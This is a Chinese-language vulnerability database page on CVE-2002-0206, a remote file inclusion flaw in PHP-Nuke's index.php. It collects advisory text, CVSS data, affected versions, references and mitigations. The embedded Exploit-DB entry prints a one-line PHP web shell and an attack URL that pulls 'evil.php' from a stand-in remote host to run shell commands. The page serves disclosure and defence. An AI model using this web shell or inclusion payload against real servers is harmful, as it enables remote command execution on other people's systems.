CVE-2002-0206
CVSS7.5
发布时间 :2002-05-16 00:00:00
修订时间 :2016-10-17 22:17:08
NMCOES    

[原文]index.php in Francisco Burzi PHP-Nuke 5.3.1 and earlier, and possibly other versions before 5.5, allows remote attackers to execute arbitrary PHP code by specifying a URL to the malicious code in the file parameter.


[CNNVD]PHP-Nuke index.php包含远程PHP脚本漏洞(CNNVD-200205-037)

        
        PHP-Nuke是一种广告流行的网站创建/维护工具。
        PHP-Nuke所带的某个PHP脚本存在一个安全问题,允许远程攻击者在PHP-Nuke运行的服务器上执行任意命令。
        PHP-Nuke的index.php脚本有个特性,允许包含远程文件,于是攻击者可以在被包含文件中放入恶意代码等待被执行,进而获取PHP-Nuke所在服务器的本地shell。这个非法本地shell拥有WEB Server进程所拥有的权限。
        目前尚不清楚PostNuke是否存在同样的问题。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:francisco_burzi:php-nuke:5.1
cpe:/a:francisco_burzi:php-nuke:2.5
cpe:/a:francisco_burzi:php-nuke:4.3
cpe:/a:francisco_burzi:php-nuke:5.2
cpe:/a:francisco_burzi:php-nuke:5.0
cpe:/a:francisco_burzi:php-nuke:3.0
cpe:/a:francisco_burzi:php-nuke:4.4
cpe:/a:francisco_burzi:php-nuke:5.0.1
cpe:/a:francisco_burzi:php-nuke:1.0
cpe:/a:francisco_burzi:php-nuke:4.4.1a
cpe:/a:francisco_burzi:php-nuke:5.2a
cpe:/a:francisco_burzi:php-nuke:4.0
cpe:/a:francisco_burzi:php-nuke:5.3.1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0206
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0206
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200205-037
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=101121913914205&w=2
(UNKNOWN)  BUGTRAQ  20020116 PHP-Nuke allows Command Execution & Much more
http://www.kb.cert.org/vuls/id/221683
(UNKNOWN)  CERT-VN  VU#221683
http://www.securityfocus.com/bid/3889
(UNKNOWN)  BID  3889
http://xforce.iss.net/xforce/xfdb/7914
(UNKNOWN)  XF  phpnuke-index-command-execution(7914)

- 漏洞信息

PHP-Nuke index.php包含远程PHP脚本漏洞
高危 输入验证
2002-05-16 00:00:00 2005-10-20 00:00:00
远程  
        
        PHP-Nuke是一种广告流行的网站创建/维护工具。
        PHP-Nuke所带的某个PHP脚本存在一个安全问题,允许远程攻击者在PHP-Nuke运行的服务器上执行任意命令。
        PHP-Nuke的index.php脚本有个特性,允许包含远程文件,于是攻击者可以在被包含文件中放入恶意代码等待被执行,进而获取PHP-Nuke所在服务器的本地shell。这个非法本地shell拥有WEB Server进程所拥有的权限。
        目前尚不清楚PostNuke是否存在同样的问题。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 在php.ini中将"allow_url_fopen"设置为"off"状态。
        厂商补丁:
        Francisco Burzi
        ---------------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.phpnuke.org

- 漏洞信息 (21230)

PHPNuke 4.x/5.x Remote Arbitrary File Include Vulnerability (EDBID:21230)
php webapps
2002-01-16 Verified
0 Handle Nopman
N/A [点击下载]
source: http://www.securityfocus.com/bid/3889/info

PHPNuke is a website creation/maintenance tool.

The 'index.php' script has a feature which allows users to include files. Due to insufficent input validation, it is possible to include files located on a remote server. Arbitrary code in the attacker's included file may be executed.

As one consequence of this issue, a remote attacker can cause commands to be executed on the shell of the host running vulnerable versions of PHPNuke. Commands will be executed with the privileges of the webserver process and may result in the attacker gaining local access.

It is not known whether this vulnerability affects PostNuke, though the possibility exists. 

Create the following file on a remote server:

<?php
system($cmd);
?>

The following URL will include the malicious file and allow the attacker to execute the "la -la" command on the shell of the host running PHPNuke:

http://insecure-server/index.php?file=http://where.the.bad.php.file.is/evil.php&cmd=ls%20-al


		

- 漏洞信息

6242
PHP-Nuke index.php Arbitrary Command Execution
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public Third-party Verified

- 漏洞描述

PHP-Nuke contains a flaw that may allow a malicious user to include a remote PHP script. The issue is triggered when an external URL argument is passed to the index.php handler. It is possible that the flaw may allow an attacker to execute arbitrary commands as the user the webserver runs as resulting in a loss of confidentiality and/or integrity.

- 时间线

2002-01-17 2001-12-28
2002-01-16 Unknow

- 解决方案

Upgrade to version 5.5 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

PHPNuke Remote Arbitrary File Include Vulnerability
Input Validation Error 3889
Yes No
2002-01-16 12:00:00 2009-07-11 09:56:00
This vulnerability was submitted to BugTraq on January 16th, 2002 by "Handle Nopman" <nopman@hackermail.com>.

- 受影响的程序版本

Francisco Burzi PHP-Nuke 5.3.1
Francisco Burzi PHP-Nuke 5.2 a
Francisco Burzi PHP-Nuke 5.2
Francisco Burzi PHP-Nuke 5.1
Francisco Burzi PHP-Nuke 5.0.1
Francisco Burzi PHP-Nuke 5.0
Francisco Burzi PHP-Nuke 4.4.1 a
Francisco Burzi PHP-Nuke 4.4
Francisco Burzi PHP-Nuke 4.3
Francisco Burzi PHP-Nuke 4.0
Francisco Burzi PHP-Nuke 3.0
- Linux kernel 2.2
Francisco Burzi PHP-Nuke 2.5
Francisco Burzi PHP-Nuke 1.0

- 漏洞讨论

PHPNuke is a website creation/maintenance tool.

The 'index.php' script has a feature which allows users to include files. Due to insufficent input validation, it is possible to include files located on a remote server. Arbitrary code in the attacker's included file may be executed.

As one consequence of this issue, a remote attacker can cause commands to be executed on the shell of the host running vulnerable versions of PHPNuke. Commands will be executed with the privileges of the webserver process and may result in the attacker gaining local access.

It is not known whether this vulnerability affects PostNuke, though the possibility exists.

- 漏洞利用

Create the following file on a remote server:

&lt;?php
system($cmd);
?&gt;

The following URL will include the malicious file and allow the attacker to execute the "la -la" command on the shell of the host running PHPNuke:

http://insecure-server/index.php?file=http://where.the.bad.php.file.is/evil.php&amp;cmd=ls%20-al

- 解决方案

Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

     

     

    关于SCAP中文社区

    SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

    版权声明

    CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站